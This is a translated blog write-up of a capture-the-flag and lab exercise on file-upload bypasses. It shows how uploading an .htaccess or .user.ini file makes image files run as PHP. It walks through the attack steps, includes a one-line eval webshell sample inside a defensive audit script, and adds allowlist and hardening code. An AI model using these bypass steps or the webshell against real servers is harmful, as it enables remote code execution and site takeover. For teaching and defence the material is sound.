File upload vulnerabilities: abusing .htaccess and .user.ini configuration files

1. .htaccess configuration file

.htaccess is Apache's per-directory configuration file: the directives it contains apply only to the directory it sits in (and that directory's subdirectories), and only if the server's AllowOverride setting lets .htaccess files override them.

A directive commonly placed in an .htaccess file is:

AddType application/x-httpd-php .php .jpg

This tells Apache to hand both .php and .jpg files to the PHP handler. We could keep appending other extensions so they are parsed as PHP too, but listing every extension is cumbersome.

A second directive avoids that:

SetHandler application/x-httpd-php

With mod_php, this makes Apache run every file in the directory through the PHP interpreter, whatever its extension.

An example follows.

In Pass-04 of upload-labs almost every script extension is blacklisted. The source code is:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        // blacklist of script extensions; note that .htaccess is not on it
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);                     // strip trailing dots from the file name (lab helper)
        $file_ext = strrchr($file_name, '.');                // everything from the last dot onwards
        $file_ext = strtolower($file_ext);                   // convert to lower case
        $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the NTFS ::$DATA stream suffix
        $file_ext = trim($file_ext);                         // strip leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;          // original name is kept on disk
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = 'Upload error!';
            }
        } else {
            $msg = 'This file type is not allowed!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}
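The blacklist check above, reproduced in Python beside an allowlist check, so the two policies can be compared on the same file names. This is an added example, not code from upload-labs: `pass04_allows` follows the PHP normalisation chain step by step (trim, deldot, strrchr, strtolower, the ::$DATA strip, trim) and shows why `.htaccess` slips through while `.user.ini` does not (`.ini` is on the list); `allowlist_allows` and `storage_name` are a suggested replacement, and the set of permitted image extensions is an assumption.

```python
"""upload-labs Pass-04 blacklist check modelled in Python, next to an allowlist replacement."""
import os
import secrets

# Pass-04 blacklist, lowercased: the PHP code lowercases the extension before in_array(),
# so the mixed-case entries of the original list are redundant and dropped here.
PASS04_DENY = {
    ".php", ".php5", ".php4", ".php3", ".php2", ".php1", ".html", ".htm",
    ".phtml", ".pht", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf",
    ".jtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx",
    ".cer", ".swf", ".ini",
}
PHP_TRIM_CHARS = " \t\n\r\0\x0b"          # characters PHP's trim() strips by default
ALLOWED_IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}   # assumption: what the app should accept


def php_strrchr(haystack: str, needle: str) -> str:
    """PHP strrchr(): substring from the last occurrence of needle; PHP's false modelled as ''."""
    idx = haystack.rfind(needle)
    return haystack[idx:] if idx != -1 else ""


def pass04_extension(file_name: str) -> str:
    """Mirror the Pass-04 normalisation chain and return the extension it compares."""
    name = file_name.strip(PHP_TRIM_CHARS)      # trim($_FILES[...]['name'])
    name = name.rstrip(".")                      # deldot(): drop trailing dots
    ext = php_strrchr(name, ".")                 # strrchr($file_name, '.')
    ext = ext.lower()                            # strtolower()
    ext = ext.replace("::$data", "")             # str_ireplace('::$DATA', ''); input already lowercased
    return ext.strip(PHP_TRIM_CHARS)             # trim()


def pass04_allows(file_name: str) -> bool:
    """True when Pass-04 would move_uploaded_file() this name into the upload directory."""
    return pass04_extension(file_name) not in PASS04_DENY


def _basename(file_name: str) -> str:
    """Last path component, treating both slash styles as separators."""
    return os.path.basename(file_name.replace("\\", "/"))


def allowlist_allows(file_name: str) -> bool:
    """Allowlist check: no dotfiles, exactly one extension, from a fixed set."""
    base = _basename(file_name)
    if not base or base.startswith(".") or "\0" in base:
        return False                              # rejects .htaccess, .user.ini and every other dotfile
    stem, ext = os.path.splitext(base)
    if not stem or "." in stem:
        return False                              # rejects "shell.php.jpg" style double extensions
    return ext.lower() in ALLOWED_IMAGE_EXT       # "cat.jpg::$DATA" fails: ext is ".jpg::$data"


def storage_name(file_name: str) -> str:
    """Server-chosen on-disk name: random stem plus the validated extension, never the client's name."""
    if not allowlist_allows(file_name):
        raise ValueError("file name not permitted")
    ext = os.path.splitext(_basename(file_name))[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in (".htaccess", ".user.ini", "shell.php", "shell.php::$DATA", "cat.jpg", "shell.php.jpg"):
        print(f"{name:20} pass04={pass04_allows(name)!s:5} allowlist={allowlist_allows(name)}")
```

Renaming on storage matters as much as the check: even with an allowlist, keeping the client's file name lets an attacker pick names the web server treats specially.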

Because .htaccess is not on the blacklist, we can upload a file named .htaccess whose content is:

SetHandler application/x-httpd-php

Once it is in place, any file subsequently uploaded to that directory is executed as PHP. We then upload an image Trojan (an image whose body carries PHP code, typically a one-sentence webshell) and connect to it with China Chopper or AntSword to obtain a webshell.

However, the .htaccess route only works on Apache, and only when mod_php is in use and AllowOverride (at least FileInfo) is enabled for the upload directory. Defenders close it by setting AllowOverride None on that directory and turning the PHP engine off there with php_admin_flag engine off.

2. .user.ini configuration file

.user.ini is likewise a per-directory configuration file, but it is read by PHP itself rather than by the web server, so it is not limited to Apache: it works behind Nginx, Apache or IIS alike whenever PHP runs as CGI/FastCGI (for example php-fpm), and it is not honoured by mod_php. Most FastCGI deployments use a non-thread-safe (NTS) PHP build, but it is the SAPI, not thread safety, that decides whether .user.ini is read.

Two directives in this file are the critical ones:

auto_prepend_file = <filename> ; included before the requested script runs
auto_append_file = <filename>  ; included after the requested script finishes (not run if the script ends with exit())

Notes:

1. Both directives behave as though the named file had been pulled in with require(): PHP executes whatever code it contains, regardless of the file's extension.

2. There must be a PHP script to request. PHP reads .user.ini only when it runs a script, scanning the script's own directory and then each parent directory up to the document root, so a .user.ini in the upload directory takes effect only once some .php file in that directory (or below it) is visited. Two further caveats: the lookup result is cached for user_ini.cache_ttl seconds (300 by default), so a freshly uploaded .user.ini may take up to five minutes to take effect; and an administrator can switch the mechanism off entirely by setting user_ini.filename to an empty value in php.ini.

Example: ctfshow web entry, challenge web153:

1. Upload a .user.ini file with the content:

auto_prepend_file = ctf.png

(ctf.png is the file that will carry the PHP code.)

2. Upload ctf.png, whose content is a one-sentence Trojan.

3. A PHP file must exist in the upload directory; in this challenge the upload directory contains index.php. Request that page (the prepend pulls ctf.png into it), then connect with China Chopper or AntSword.
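Seen from the defender's side, both techniques leave the same three artefacts in the upload tree: an .htaccess that overrides the handler, a .user.ini that prepends or appends a file, and a "picture" that contains a PHP opening tag. The script below is an added example (not part of the original write-up or the challenges) that audits an upload directory for exactly those artefacts. `SAMPLE_UPLOAD_DIR` is a constructed tree modelled on the two scenarios above; the set `PHP_EXTENSIONS` and the rule that a relative `auto_prepend_file` target is resolved against the directory holding the .user.ini are assumptions (PHP really consults include_path and the working directory, which php-fpm sets to the script's directory).

```python
"""Audit an upload directory for .htaccess / .user.ini files that redirect PHP execution."""
import os
import posixpath
import re

# Apache directives that change which handler processes a file; none belong in an upload directory.
HTACCESS_DIRECTIVE_RE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|php_value|php_flag|php_admin_value)\b\s*(.*?)\s*$", re.I)
# PHP ini directives that splice another file into every script run from the directory.
USER_INI_DIRECTIVE_RE = re.compile(r"^\s*(auto_prepend_file|auto_append_file)\s*=\s*(.*?)\s*$", re.I)
# Opening tags that make a "picture" execute once a handler override or prepend is in place.
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.I)
PHP_EXTENSIONS = {".php", ".phtml", ".phar", ".inc"}    # assumption: what counts as a PHP file

# Constructed sample tree: the web153 artefacts at the top level, the upload-labs ones under avatars/.
SAMPLE_UPLOAD_DIR = {
    "index.php": "<?php echo 'upload ok';",
    ".user.ini": "auto_prepend_file = ctf.png\n",
    "ctf.png": "GIF89a<?php @eval($_POST['cmd']); ?>",
    "avatars/.htaccess": "SetHandler application/x-httpd-php\n",
    "avatars/cat.jpg": "\xff\xd8\xff\xe0 not really an image, but no PHP tag either",
    "docs/readme.txt": "nothing to see here",
}


def _ini_value(raw: str) -> str:
    """Strip a trailing ';' comment and surrounding quotes from an ini directive value."""
    value = raw.split(";", 1)[0].strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        value = value[1:-1]
    return value


def audit_upload_files(files: dict) -> list:
    """files maps a relative POSIX path to its text content. Returns (path, kind, detail) findings."""
    findings = []
    for path, content in sorted(files.items()):
        directory, base = posixpath.split(path)
        base_lower = base.lower()
        ext = posixpath.splitext(base)[1].lower()
        if base_lower == ".htaccess":
            for line in content.splitlines():
                m = HTACCESS_DIRECTIVE_RE.match(line)
                if m:
                    findings.append((path, m.group(1), m.group(2)))
        elif base_lower == ".user.ini":
            for line in content.splitlines():
                m = USER_INI_DIRECTIVE_RE.match(line)
                if not m:
                    continue
                target = _ini_value(m.group(2))
                # Assumption: resolve a relative target against the directory holding the .user.ini.
                target_path = posixpath.normpath(posixpath.join(directory, target))
                if target_path not in files:
                    detail = f"{target} (target not found)"
                elif posixpath.splitext(target_path)[1].lower() in PHP_EXTENSIONS:
                    detail = f"{target} (PHP file)"
                else:
                    detail = f"{target} (exists, non-PHP extension: code hidden in a data file?)"
                findings.append((path, m.group(1).lower(), detail))
        elif ext not in PHP_EXTENSIONS and PHP_TAG_RE.search(content):
            findings.append((path, "php_tag", "PHP opening tag inside a non-PHP file"))
    return findings


def audit_tree(root: str) -> list:
    """Walk a real directory on disk and run the same audit over it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                files[rel] = fh.read(65536).decode("latin-1")   # first 64 KiB covers config and tags
    return audit_upload_files(files)


if __name__ == "__main__":
    for path, kind, detail in audit_upload_files(SAMPLE_UPLOAD_DIR):
        print(f"{path:20} {kind:18} {detail}")
```

Run `audit_tree("/var/www/html/upload")` (path assumed) from cron or an incident-response checklist; any finding in a directory that is supposed to hold only images is worth a ticket, whether or not a matching webshell is found next to it.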

Reference: The magical use of .htaccess and .user.ini configuration files

Origin: blog.csdn.net/qq_45742511/article/details/113817332